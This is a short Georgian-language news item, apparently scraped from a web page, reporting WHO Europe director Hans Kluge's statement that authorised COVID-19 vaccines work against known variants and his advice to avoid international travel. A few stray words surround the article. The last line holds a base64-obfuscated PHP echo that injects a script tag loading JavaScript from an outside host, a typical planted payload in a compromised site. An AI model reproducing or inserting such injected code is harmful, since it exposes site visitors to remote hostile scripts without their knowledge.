celsiusi
ავერსი საქკაბელი
კოვიდ 19-ის საწინააღმდეგო ავტორიზებული ვაქცინები ეფექტურია კორონავირუსის ყველა ცნობილი ვარიანტის, მათ შორის ე.წ. „ინდური ვარიანტის, წინააღმდეგ, - „ფრანს-პრესის“ ინფორმაციით, ამის შესახებ ჯანდაცვის მსოფლიო ორგანიზაციის ევროპის რეგიონის დირექტორმა ჰანს კლუგემ განაცხადა.
 
ამასთან, მისივე თქმით, კორონავირუსის პანდემიის წინააღმდეგ ბრძოლაში მიღწეული პროგრესი მყიფე რჩება და საჭიროა, საერთაშორისო მოგზაურობისგან თავის შეკავება.
 
„ახლა, მუდმივი საფრთხისა და გაურკვევლობის ფონზე, ჩვენ უნდა გავაგრძელოთ სიფრთხილის გამოჩენა და გადავხედოთ ან თავიდან ავიცილოთ საერთაშორისო მოგზაურობა”, - აღნიშნა კლუგემ.
 
მისი ინფორმაციით, „ინდური ვარიანტი“, რომელიც, სავარაუდოდ უფრო გადამდებია, ჯანმო-ს ევროპის რეგიონის 53 ქვეყნიდან სულ მცირე 26-შია გამოვლენილი.
1229
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");